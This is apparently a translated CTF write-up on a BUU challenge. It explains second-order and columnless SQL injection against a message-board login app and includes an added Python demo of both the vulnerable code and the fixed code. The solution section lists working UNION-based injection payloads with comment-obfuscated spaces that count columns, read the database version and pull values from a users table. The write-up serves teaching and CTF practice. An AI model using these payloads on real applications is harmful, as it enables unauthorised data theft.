Preface
The challenge can be reproduced on BUU. The main knowledge points are SQL second-order injection, columnless injection, and the information_schema database in MySQL: https://www.anquanke.com/post/id/193512
Columnless injection: https://www.cnblogs.com/Lee-404/p/12833788.html
Solution
Opening the challenge shows a login page with a registration page. Registering an arbitrary account and logging in leads to an interface that works like a message board.
After some fuzzing, it turns out to be a second-order injection: when the ad name is 1', an error is thrown.
Guessed statement
select * from table_name where id = '$id' limit 0,1
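The following script is an added example, not code from the original writeup or the challenge, showing why the quote in the stored ad name only bites later. The `ads` table, its columns and the owner name are assumptions, and SQLite stands in for MySQL so it runs offline; the stored value `1'` is the one the fuzzing step above used. The first insert binds its parameter and is harmless; the bug is the second query, which trusts the value it reads back from the database and splices it into a string in the `where id = '$id' limit 0,1` pattern. The fixed variant binds the stored value as well.

```python
import sqlite3

# Added example (not from the original writeup): a minimal model of a
# second-order SQL injection. Table/column names are assumptions and SQLite
# stands in for MySQL so the script runs offline.


def setup_db():
    """Create an in-memory database with a constructed 'ads' table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE ads (id INTEGER PRIMARY KEY, owner TEXT, name TEXT)"
    )
    return conn


def create_ad(conn, owner, name):
    """First order: the ad name is stored with a bound parameter.

    This insert is safe by itself; the quote inside the name is stored
    verbatim and nothing breaks yet, which is why the injection is only
    visible in a later step.
    """
    cur = conn.execute(
        "INSERT INTO ads (owner, name) VALUES (?, ?)", (owner, name)
    )
    conn.commit()
    return cur.lastrowid


def view_ad_vulnerable(conn, ad_id):
    """Second order (vulnerable): read the stored name back, then splice it
    into a new statement by string formatting, i.e. the
    select * from table_name where id = '$id' limit 0,1 pattern."""
    (name,) = conn.execute(
        "SELECT name FROM ads WHERE id = ?", (ad_id,)
    ).fetchone()
    sql = "SELECT * FROM ads WHERE name = '%s' LIMIT 0,1" % name
    try:
        return ("ok", conn.execute(sql).fetchone())
    except sqlite3.Error as exc:
        # A stored value such as 1' breaks the quoting and the database
        # reports a syntax error: the symptom seen while fuzzing.
        return ("error", str(exc))


def view_ad_fixed(conn, ad_id):
    """Second order (fixed): data read back from the database is still
    untrusted input, so the second query binds it as a parameter too."""
    (name,) = conn.execute(
        "SELECT name FROM ads WHERE id = ?", (ad_id,)
    ).fetchone()
    row = conn.execute(
        "SELECT * FROM ads WHERE name = ? LIMIT 0,1", (name,)
    ).fetchone()
    return ("ok", row)


def demo(ad_name="1'"):
    """Store one ad name, then run both code paths against it."""
    conn = setup_db()
    ad_id = create_ad(conn, "tester", ad_name)
    return view_ad_vulnerable(conn, ad_id), view_ad_fixed(conn, ad_id)


if __name__ == "__main__":
    vuln, fixed = demo()
    print("vulnerable:", vuln)
    print("fixed:     ", fixed)
```

Running it prints an error tuple for the vulnerable path and the stored row for the fixed one; with a benign name such as `hello` both paths return the same row, which is the point: the difference only appears once a stored value carries SQL syntax.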
Inject directly in one go
Get the number of columns
-1'/**/group/**/by/**/22,'1 // there are 22 columns; they have to be tried one by one
Check the version
-1'/**/union/**/select/**/1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'
View table names
-1'/**/union/**/select/**/1, (select/**/group_concat(a)/**/from(select/**/1,2/**/as/**/a,3/**/as/**/b/**/union/**/select*from/**/users)x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/'
View table values
-1'/**/union/**/select/**/1, (select/**/group_concat(b)/**/from(select/**/1,2/**/as/**/a,3/**/as/**/b/**/union/**/select*from/**/users)x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/'1
Reference links
https://www.cnblogs.com/wangtanzhi/p/12241499.html